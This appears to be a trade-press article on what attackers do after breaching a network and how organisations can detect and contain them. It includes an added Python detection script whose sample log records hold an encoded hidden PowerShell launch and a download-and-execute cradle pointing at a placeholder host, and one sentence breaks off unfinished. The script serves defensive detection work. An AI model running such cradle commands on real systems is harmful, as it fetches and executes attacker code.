Post-Compromise Security: What to do When the Hackers Get in


When a cybercriminal compromises your network they often do not strike immediately. There is a vast amount of activity undertaken by threat actors between initial compromise and impact.

This presents a critical window of opportunity for cybersecurity professionals and it is vital to identify and neutralize these hidden threats before they attack.

Initial compromise is one of the easiest parts of a cyber-attack for cybercriminals. Specialist initial access brokers now have ways to infiltrate organizations en masse, especially by exploiting vulnerabilities in widely used software products.

This has led to threat actors developing a sophisticated arsenal of post-compromise techniques and tools to maximize the impact of their attacks once inside victim networks.

It is vital organizations focus on this aspect of their defenses, alongside preventing initial access.

What Post-Compromise Activity Looks Like 

Post-compromise activity refers to the tactics, techniques and procedures (TTPs) used by threat actors after gaining access to the target network.

The goal of this process is to gain a foothold in the network, move laterally without being detected and access the most valuable data and systems.

Speaking to Infosecurity, Holly Grace Williams, Managing Director at Akimbo Core, explained that her three main goals while conducting penetration tests on client organizations are to:

  • Retain Access (Persistence)
  • Enhance Access (Privilege Escalation)
  • Increase Access (Propagation/Lateral Movement)

“Once we’ve put the work in to know that our connection is solid and that we’ve gained all the access that we can – then we look to demonstrate impact,” she commented.

These approaches are important for both nation-state and financially motivated threat actors. Nation-state actors are often focused on espionage, meaning that the more time they spend on a network uncovering where sensitive data is held, the better.

Dr Jamie Collier, Senior Threat Intelligence Advisor at Mandiant, explained: “State espionage groups are far more persistent and focused on long-term collection targets.”

Financially motivated attackers also conduct extensive post-compromise activity, primarily to discover and exfiltrate the most valuable data. This includes ransomware attackers, who traditionally encrypt files as quickly as possible. Recently, the threat of publishing data has become the primary method of extorting victims, necessitating time and resources to discover and exfiltrate sensitive data on target networks.

Martin Zugec, Technical Solutions Director at Bitdefender, noted: “Ransomware attackers focus on two things: expanding their access and staying hidden.”

Post-Compromise Techniques

Attackers’ Living-off-the-Land 

Attackers can operate in victim networks undisturbed by avoiding detection and evading defensive tools. This is commonly achieved by leveraging legitimate tools already present inside the victim’s network, a concept known as ‘living-off-the-land’.

Zugec noted that while powerful hacking frameworks, such as Metasploit, are available to threat actors, they have found that “subtler” methods that don’t rely on easily detectable files are more effective for stealthy attacks.

This has resulted in the growing exploitation of legitimate tools such as PowerShell. SonicWall’s 2024 Mid-Year Cyber Threat Report found that PowerShell – a legitimate Windows automation tool used by developers – is now exploited by over 90% of malware families. The exploitation of legitimate network tools in this way

Erhan Temurkan, Director of Security and Technology at Fleet Mortgages, told Infosecurity: “In essence, they’re trying to make it look like genuine user activity. They are the same tools administrators will use every day. They’re not tools you can block because IT teams are using those to monitor and manage your systems.”
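Because the tools are legitimate, detection has to come from how they are used rather than from their presence. As an added example (not from the article or any of the organizations it quotes), the following Python triages constructed PowerShell script block log records and flags the patterns that distinguish living-off-the-land abuse from routine administration; the records, account names, admin-account list and URL are all made up for illustration.

```python
import re

# Constructed sample records, loosely modelled on PowerShell script block
# logging (Event ID 4104): who ran it, where, what launched it, what it ran.
SAMPLE_EVENTS = [
    {"user": "CORP\\alice", "host": "WS-0142", "parent": "explorer.exe",
     "script": "Get-Service -Name Spooler | Restart-Service"},
    {"user": "CORP\\svc-backup", "host": "FS-01", "parent": "winword.exe",
     "script": "powershell -nop -w hidden -enc QUFBQUFBQUFBQUFB"},  # fake base64
    {"user": "CORP\\bob", "host": "WS-0207", "parent": "cmd.exe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"user": "CORP\\adm-carol", "host": "DC-01", "parent": "conhost.exe",
     "script": "Get-ADUser -Filter * -Properties LastLogonDate"},
]

# Assumed: the small, known set of accounts permitted to do admin work.
ADMIN_ACCOUNTS = {"CORP\\adm-carol"}
# Office applications have no business spawning a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}

# Content rules: each fires on a pattern that rarely appears in genuine admin use.
RULES = [
    ("encoded-command", re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}")),
    ("hidden-window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("download-cradle", re.compile(
        r"(?i)(?:IEX|Invoke-Expression).*(?:DownloadString|Invoke-WebRequest|iwr)"
        r"|(?:DownloadString|Invoke-WebRequest|iwr).*(?:IEX|Invoke-Expression)")),
]


def triage(event):
    """Return the list of reasons this record deserves analyst attention (empty if none)."""
    reasons = [name for name, pattern in RULES if pattern.search(event["script"])]
    if event["parent"].lower() in OFFICE_PARENTS:
        reasons.append("office-parent")
    # Context rule: directory-admin cmdlets run by an account outside the admin set.
    if re.search(r"(?i)\b(?:Get|Set|New|Remove)-AD\w+", event["script"]) \
            and event["user"] not in ADMIN_ACCOUNTS:
        reasons.append("ad-cmdlet-from-non-admin")
    return reasons


def suspicious(events):
    """Pair each flagged record with its reasons, in log order."""
    return [(e, triage(e)) for e in events if triage(e)]


if __name__ == "__main__":
    for event, reasons in suspicious(SAMPLE_EVENTS):
        print(f"{event['user']}@{event['host']}: {', '.join(reasons)}")
```

In a real deployment the admin-account set would come from the directory and the rules would be tuned against a baseline of the organization’s own administrator activity.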

Disabling Defensive Capabilities 

Many threat actors use malware that contains obfuscation, defense evasion and lateral movement capabilities.

A 2024 Cisco Talos report highlighted how the most prominent ransomware groups focus on defense evasion, including disabling and modifying security software such as anti-virus programs, and obfuscating malicious software by packing and compressing the code.

A variety of novel techniques have been observed in recent years to enable such approaches.  For example, HP Wolf researchers reported in August 2023 that QakBot malware campaigns are switching up different file types and techniques to bypass detection tools and security policies.

Collier noted: “Threat actors typically rely on legitimate remote access tools as well as a variety of tunneler and proxy malware to maintain their presence in victim networks.”


Credential Theft and Privilege Escalation 

Threat actors place a significant emphasis on accessing legitimate user credentials that they can leverage once inside a network for lateral movement, particularly if they are of privileged users, such as administrators.

“Obtaining valid credentials remains a highly effective approach for actors looking to escalate privileges, making it essential for organizations to look out for a variety of credential stealers being used,” explained Collier.

Strategies for Post-Compromise Defense 

Threat actors’ rising post-compromise capabilities are a major source of concern. However, their longer dwell time in networks offers opportunities for defenders to disrupt attacks before a damaging incident occurs.

Williams advised: “Don’t think of attacks as a single activity, or a single action, but a series of stages the attack moves through and aim to disrupt them at every one.”

Given the vast scale of attacks, including those on the software supply chain, it is vital organizations recognize that attackers are highly likely to infiltrate their systems at some stage, and that they plan accordingly.

Collier noted: “The increase in exploitation makes it essential for defenders to adopt a security posture where initial access is already assumed. By inserting security controls that address common post-compromise activity, organizations introduce multiple hurdles for extortion groups targeting their network.”

There are a vast range of actions organizations can take to disrupt attackers in their network and prevent them from achieving their aims.

Network Segmentation 

Strict network segmentation makes lateral movement very difficult for threat actors. However, Williams noted that in her work as a penetration tester she rarely sees this implemented effectively.

“Decent network segmentation is rare to see, no doubt because it’s time consuming to implement and requires a different way of working for IT Teams, but it works very well when it’s done correctly,” noted Williams.

Richard Hughes, Vice President Technology, Information Security & Data at biotech firm Bicycle Therapeutics, explained his organization’s approach to segmentation as “aggressive and immediate.”

“If an unauthorized engineer or device attempts to access our network, their machine is immediately shut down at the source. We don't allow any lateral movement within our network, and even initial scans of our environment are blocked at the source. This rapid response capability is crucial in preventing potential threats from gaining a foothold in our systems,” Hughes told Infosecurity.

Access Controls and Least Privilege 

Strong access controls are essential to prevent attackers from using stolen credentials to help them move through networks without detection, particularly for privileged users such as administrators.

Williams advised that organizations limit the number of administrator accounts to as few as possible and only allow these accounts to be used for administrator activities. Additionally, service accounts should be minimized and have stricter policies in place.


This is an approach endorsed by Hughes: “Regular user machines do not have admin access, and we maintain a limited number of admin accounts for our IT staff. This significantly reduces the potential attack surface and is intended to limit the impact of any potential compromise.”

Monitoring and Detection Tools 

Endpoint detection and response (EDR) and managed detection and response (MDR) tools have seen significant advancements in recent years.

These solutions are designed to detect and tackle threats that evade traditional security tools, minimizing attacker dwell time in networks. This includes leveraging proactive threat hunting.

Bitdefender’s Zugec emphasized that simply having these tools in place is not sufficient. The first challenge is ensuring they are accessible and effective for companies of all sizes.

Additionally, they require humans to be actively monitoring them, be it internally or externally.

Obfuscation and Decoys

Organizations can leverage a range of techniques to make it harder for attackers to locate and access the most sensitive data and systems in a network. One approach is to encrypt, mask and tokenize sensitive data.

Temurkan also highlighted the effectiveness of deploying honeypots and decoys in the network - essentially mimicking a high-value target to lure attackers into targeting it.

These fake targets can then be actively monitored, and attackers’ techniques analyzed without any damage being caused.

Temurkan explained: “Attackers will think they’ve hit your crown jewels but it’s just a way to detect that activity and you isolate them in that region.”

In August 2024, the UK’s National Cyber Security Centre (NCSC) called for organizations to deploy cyber deception technologies at scale to assess their efficacy.

Penetration Testing 

Regular penetration tests, conducted by skilled ethical hackers, are crucial for properly testing systems under real-world conditions and ensuring security measures are working as intended.

These exercises can also be undertaken without warning to truly test an organization’s defenses, utilizing the latest techniques used by threat actors.

This approach enables weaknesses to be identified early and addressed before a real attacker finds them and is able to travel through networks unimpeded.

Zugec said: “Turn ‘what-ifs’ into regular drills. Don't just imagine worst-case scenarios.”

Boost the Human Firewall 

Employees can also help in identifying system compromise, if they are trained on simple indicators that could come up in their day-to-day work.

Temurkan gave the example of multi-factor authentication (MFA), which as well as providing an extra layer of account protection, can be utilized as a monitoring tool.

For example, if an employee receives an app-based MFA notification they did not request, they should immediately report it to their IT team.

Conclusion 

Attackers are becoming more adept at compromising networks, particularly through the rapid exploitation of software vulnerabilities.

However, initial access is far from the end of the journey, and modern attackers carry out substantial post-compromise activity to achieve their aims.

It is crucial that organizations place just as much emphasis – arguably more – on their post-compromise defenses, using every possible means of making life harder for attackers and ensuring their most valuable data and systems are heavily protected.

The harder attackers have to work to move laterally, the more opportunities this gives defenders to identify, and eliminate, rising cyber threats.
